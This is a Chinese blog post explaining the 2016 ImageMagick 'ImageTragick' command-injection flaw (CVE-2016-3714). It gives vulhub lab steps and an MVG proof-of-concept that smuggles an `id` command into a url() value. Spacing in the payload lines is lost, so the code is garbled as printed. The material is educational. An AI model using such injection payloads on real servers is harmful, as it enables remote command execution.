大家好,我是小白哥。
這兩天,關于QQ盜號的安全事件相信大家已經聽說了。各種各樣的傳言都有,一會兒數據庫泄露了,一會兒API漏洞了,一會兒又是協議漏洞了,還有的說掃描二維碼中招的,一時間眾說紛紜。
在眾多說法中,我看到了一個:只要點擊圖片就會中招!
好家伙,點圖片就能中招,這可厲害了,要是對方發來一些誘惑的圖片,年輕人把持不住那可咋整?
真有那么懸乎嗎?
這不禁讓我想起了幾年前的一個漏洞,也是圖片相關的,分享給大家看看。
那次漏洞的主角,是ImageMagick。
漏洞介紹
漏洞名稱
:Imagemagick 命令注入漏洞(CVE-2016-3714)
漏洞定級
:高危
漏洞描述
:ImageMagick 在處理惡意構造的圖片文件時,對于文件中的 URL 未經嚴格過濾,可導致命令注入漏洞。通過命令注入漏洞,黑客可以在服務器上執行任意系統命令,獲取服務器權限。
影響范圍
:ImageMagick 6.9.3-9本身及以前所有版本
漏洞原理
ImageMagick是一款使用量很廣的圖片處理程序,很多廠商都調用了這個程序進行圖片處理,包括圖片的伸縮、切割、水印、格式轉換等等。
但有研究者發現,當用戶傳入一個包含『畸形內容』的圖片的時候,就有可能觸發命令注入漏洞。
國外的安全人員為此新建了一個網站:https://imagetragick.com/
與這個漏洞相關的CVE有CVE-2016-3714
、CVE-2016-3715
、CVE-2016-3716
、CVE-2016-3717
,
其中最嚴重的就是CVE-2016-3714,利用這個漏洞可以造成遠程命令執行的危害。
ImageMagick有一個功能叫做delegate(委托)
,作用是調用外部的lib來處理文件。而調用外部lib的過程是使用系統的system命令來執行的
參考代碼:https://github.com/ImageMagick/ImageMagick/blob/e93e339c0a44cec16c08d78241f7aa3754485004/MagickCore/delegate.c#L347
我們在ImageMagick的默認配置文件里可以看到所有的委托:/etc/ImageMagick/delegates.xml漏洞報告中給出的POC是利用了如下的這個委托:
"https"command=""curl"-s-k-o"%o""https:%M""/>
它在解析https圖片的時候,使用了curl命令將其下載,我們看到%M被直接放在curl的最后一個參數內。
ImageMagick默認支持一種圖片格式,叫mvg,而mvg與svg格式類似,其中是以文本形式寫入矢量圖的內容,而這其中就可以包含https處理過程。
所以我們可以構造一個.mvg格式的圖片(但文件名可以不為.mvg,比如下圖中包含payload的文件的文件名為vul.gif,而ImageMagick會根據其內容識別為mvg圖片),并在https://后面閉合雙引號,寫入自己要執行的命令:
pushgraphic-context
viewbox00640480
fill‘url(https://"|id;")’
popgraphic-context
這樣,ImageMagick在正常執行圖片轉換、處理的時候就會觸發漏洞。
漏洞復現
- 搭建靶機,教程:https://github.com/vulhub/vulhub/tree/master/imagemagick/imagetragick
- 下載vulhub:git clone https://github.com/vulhub/vulhub/tree/master/imagemagick/imagetragick
- 進入目錄:cd /vulhub-master/imagemagick/imagetragick
- 啟動docker:docker-compose up -d 注意 我靶機 docker-compose.yml中端口為8888
- 訪問搭建的靶機ip:8888
- 上傳poc,新建一個txt文件,內容為:
pushgraphic-context
viewbox00640480
fill'url(https://"|id;")'
popgraphic-context
將文件保存為poc.gif
上次poc.gif,點擊提交,成功執行:
這年頭,除了鏈接,圖片也不敢隨便亂點了···
————————————————
漏洞原理和復現部分原文鏈接:https://blog.csdn.net/u011975363/article/details/118031227
-
數據庫
+關注
關注
7文章
3816瀏覽量
64448 -
漏洞
+關注
關注
0文章
204瀏覽量
15392 -
圖片處理
+關注
關注
0文章
16瀏覽量
6873
原文標題:看圖片也能中招!
文章出處:【微信號:AndroidPush,微信公眾號:Android編程精選】歡迎添加關注!文章轉載請注明出處。
發布評論請先 登錄
相關推薦
評論